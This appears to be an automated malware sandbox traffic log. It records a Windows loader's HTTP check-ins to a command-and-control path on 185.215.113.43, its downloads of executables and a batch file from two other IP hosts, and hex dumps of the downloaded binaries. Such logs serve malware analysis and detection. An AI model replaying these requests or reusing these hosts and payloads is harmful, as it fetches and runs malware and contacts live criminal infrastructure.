00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Jan 2025 09:09:26 GMTContent-Type: application/octet-streamContent-Length: 1453568Last-Modified: Tue, 07 Jan 2025 01:21:30 GMTConnection: keep-aliveETag: "677c819a-162e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 44 cb 66 67 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 08 00 00 24 16 00 00 08 00 00 00 00 00 00 fe 42 16 00 00 20 00 00 00 60 16 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 16 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 42 16 00 4b 00 00 00 00 60 16 00 88 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 16 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 23 16 00 00 20 00 00 00 24 16 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 88 05 00 00 00 60 16 00 00 06 00 00 00 26 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 16 00 00 02 00 00 00 2c 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 42 16 00 00 00 00 00 48 00 00 00 02 00 05 00 30 31 02 00 94 5a 01 00 03 00 00 00 03 00 00 06 c4 8b 03 00 e0 b6 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 00 00 1a 28 01 00 00 06 2a 00 1a 28 0e 00 00 06 2a 00 1e 02 28 01 00 00 0a 2a 13 30 03 00 bc 00 00 00 01 00 00 11 20 03 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 04 00 00 00 0b 00 00 00 05 00 00 00 71 00 00 00 48 00 00 00 38 06 00 00 00 7e 01 00 00 04 2a 72 01 00 00 70 d0 03 00 00 02 28 02 00 00 0a 6f 03 00 00 0a 73 04 00 00 0a 80 01 00 00 04 20 00 00 00 00 7e 01 02 00 04 7b ac 01 00 04 3a ae ff ff ff 26 20 01 00 00 00 38 a3 ff ff ff 7e 01 00 00 04 39 b9 ff ff ff 20 02 00 00 00 7e 01 02 00 04 7b 06 02 00 04 39 85 ff ff ff 26 20 01 00 00 00 38 7a ff ff ff 38 8f ff ff ff 20 00 00 00 00 7e 01 02 00 04 7b e8 01 00 04 39 61 ff ff ff 26 20 00 00 00 00 38 56 ff ff ff 1a 7e 02 00 00 04 2a 00 1e 02 80 02 00 00 04 2a 6a 28 05 00 00 06 72 3f 00 00 70 7e 02 00 00 04 6f 05 00 00 0a 74 01 00 00 1b 2a 00 26 7e 03 00 00 04 14 fe 01 2a 00 00 1a 7e 03 00 00 04 2a 00 13 30 04 00 64 00 00 00 01 00 00 11 20 01 00 00 00 fe 0e 00 00 38 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Jan 2025 09:09:31 GMTContent-Type: application/octet-streamContent-Length: 198656Last-Modified: Mon, 06 Jan 2025 19:07:23 GMTConnection: keep-aliveETag: "677c29eb-30800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 1b 25 7c 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 fc 02 00 00 0a 00 00 00 00 00 00 3e 1a 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec 19 03 00 4f 00 00 00 00 20 03 00 26 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 fa 02 00 00 20 00 00 00 fc 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 26 06 00 00 00 20 03 00 00 08 00 00 00 fe 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 03 00 00 02 00 00 00 06 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 1a 03 00 00 00 00 00 48 00 00 00 02 00 05 00 d0 4f 02 00 1c ca 00 00 03 00 00 00 5c 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 67 5a 24 b4 b1 b4 b4 b4 b0 b4 b4 b4 b5 b5 b4 b4 fc b4 b4 b4 b4 b4 b4 b4 74 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b3 b4 b4 a6 95 fa a6 b4 00 ab e7 93 fc b3 68 e7 93 60 4c 4b 41 94 44 42 45 4d 42 53 47 94 51 53 46 46 45 40 94 52 4f 94 42 3f 46 94 4b 46 94 70 65 61 94 47 45 50 4f 86 a7 a7 aa 90 b4 b4 b4 b4 b4 b4 b4 d5 68 06 ac 19 87 f4 59 19 87 f4 59 19 87 f4 59 e4 5f f1 5a 24 87 f4 59 e4 5f ef 5a a2 87 f4 59 e4 5f f0 5a 25 87 f4 59 e4 5f f3 5a 15 87 f4 59 f8 c9 f9 59 1c 87 f4 59 19 87 f3 59 bc 87 f4 59 eb 5c ef 5a 2f 87 f4 59 eb 5c f0 5a 20 87 f4 59 eb 5c f1 5a 25 87 f4 59 19 87 f4 59 1a 87 f4 59 5e 5c f4 5a 1a 87 f4 59 5e 5c f2 5a 1a 87 f4 59 62 4b 51 4c 19 87 f4 59 b4 b4 b4 b4 b4 b4 b4 b4 64 6f b4 b4 68 b3 b0 b4 9a 8f 38 4d b4 b4 b4 b4 b4 b4 b4 b4 d4 b4 b2 93 a9 b3 a6 97 b4 96 b3 b4 b4 b6 b4 b4 b4 b4 b4 b4 16 42 b4 b4 b4 a4 b4 b4 b4 84 b3 b4 b4 b4 b4 a4 b4 a4 b4 b4 b
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Jan 2025 09:09:35 GMTContent-Type: application/octet-streamContent-Length: 1038693Last-Modified: Tue, 07 Jan 2025 02:01:09 GMTConnection: keep-aliveETag: "677c8ae5-fd965"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 64 86 05 00 d4 ec d7 4c 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 08 00 00 ae 01 00 00 38 01 00 00 00 00 00 64 b7 01 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 30 03 00 00 04 00 00 37 b3 0f 00 02 00 00 80 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc fb 01 00 c8 00 00 00 00 70 02 00 fc be 00 00 00 50 02 00 bc 16 00 00 05 7f 0f 00 60 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 01 00 10 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 ad 01 00 00 10 00 00 00 ae 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c 52 00 00 00 c0 01 00 00 54 00 00 00 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a8 2f 00 00 00 20 02 00 00 0c 00 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 bc 16 00 00 00 50 02 00 00 18 00 00 00 12 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc be 00 00 00 70 02 00 00 c0 00 00 00 2a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Jan 2025 09:09:40 GMTContent-Type: application/octet-streamContent-Length: 500224Last-Modified: Mon, 06 Jan 2025 15:03:34 GMTConnection: keep-aliveETag: "677bf0c6-7a200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ad f0 7b 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 96 07 00 00 0a 00 00 00 00 00 00 4e b4 07 00 00 20 00 00 00 c0 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 08 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 b3 07 00 57 00 00 00 00 c0 07 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 94 07 00 00 20 00 00 00 96 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 36 06 00 00 00 c0 07 00 00 08 00 00 00 98 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 07 00 00 02 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 b4 07 00 00 00 00 00 48 00 00 00 02 00 05 00 d0 e9 06 00 24 ca 00 00 03 00 00 00 5c 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 67 5a 24 b4 b1 b4 b4 b4 b0 b4 b4 b4 b5 b5 b4 b4 fc b4 b4 b4 b4 b4 b4 b4 74 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b3 b4 b4 a6 95 fa a6 b4 00 ab e7 93 fc b3 68 e7 93 60 4c 4b 41 94 44 42 45 4d 42 53 47 94 51 53 46 46 45 40 94 52 4f 94 42 3f 46 94 4b 46 94 70 65 61 94 47 45 50 4f 86 a7 a7 aa 90 b4 b4 b4 b4 b4 b4 b4 d5 68 06 ac 19 87 f4 59 19 87 f4 59 19 87 f4 59 e4 5f f1 5a 24 87 f4 59 e4 5f ef 5a a2 87 f4 59 e4 5f f0 5a 25 87 f4 59 e4 5f f3 5a 15 87 f4 59 f8 c9 f9 59 1c 87 f4 59 19 87 f3 59 bc 87 f4 59 eb 5c ef 5a 2f 87 f4 59 eb 5c f0 5a 20 87 f4 59 eb 5c f1 5a 25 87 f4 59 19 87 f4 59 1a 87 f4 59 5e 5c f4 5a 1a 87 f4 59 5e 5c f2 5a 1a 87 f4 59 62 4b 51 4c 19 87 f4 59 b4 b4 b4 b4 b4 b4 b4 b4 64 6f b4 b4 68 b3 b0 b4 09 c4 39 4d b4 b4 b4 b4 b4 b4 b4 b4 d4 b4 b2 93 a9 b3 a6 97 b4 8e b3 b4 b4 24 af b4 b4 b4 b4 b4 c6 3b b4 b4 b4 a4 b4 b4 b4 74 b3 b4 b4 b4 b4 a4 b4 a4 b4 b4 b
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Jan 2025 09:09:44 GMTContent-Type: application/octet-streamContent-Length: 1038693Last-Modified: Tue, 07 Jan 2025 02:01:08 GMTConnection: keep-aliveETag: "677c8ae4-fd965"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 64 86 05 00 d4 ec d7 4c 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 08 00 00 ae 01 00 00 38 01 00 00 00 00 00 64 b7 01 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 30 03 00 00 04 00 00 37 b3 0f 00 02 00 00 80 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc fb 01 00 c8 00 00 00 00 70 02 00 fc be 00 00 00 50 02 00 bc 16 00 00 05 7f 0f 00 60 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 01 00 10 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 ad 01 00 00 10 00 00 00 ae 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c 52 00 00 00 c0 01 00 00 54 00 00 00 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a8 2f 00 00 00 20 02 00 00 0c 00 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 bc 16 00 00 00 50 02 00 00 18 00 00 00 12 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc be 00 00 00 70 02 00 00 c0 00 00 00 2a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 32 32 43 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB22C77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /test/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 33 31 32 36 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1031268001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /test/am_no.bat HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 33 32 31 34 31 30 32 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1032141021&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 33 32 36 31 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1032619001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/1506757897/Dd7mHw1.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 33 32 36 32 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1032622001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/5876083921/tbd0KQd.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 33 32 36 32 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1032624001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/899392756/artVssK.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 33 32 36 34 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1032645001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/6069966613/VDoTjfk.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 33 32 36 37 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1032672001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/6332377394/D95Ju8g.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 33 32 38 38 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1032884001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/7809335824/ZNWzk16.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 33 32 39 31 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1032914001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/7124748205/mQvinTe.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 33 33 32 32 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1033224001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/armen/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 33 33 35 35 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1033551001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/kitty/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 33 33 35 35 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1033552001&unit=246122658369

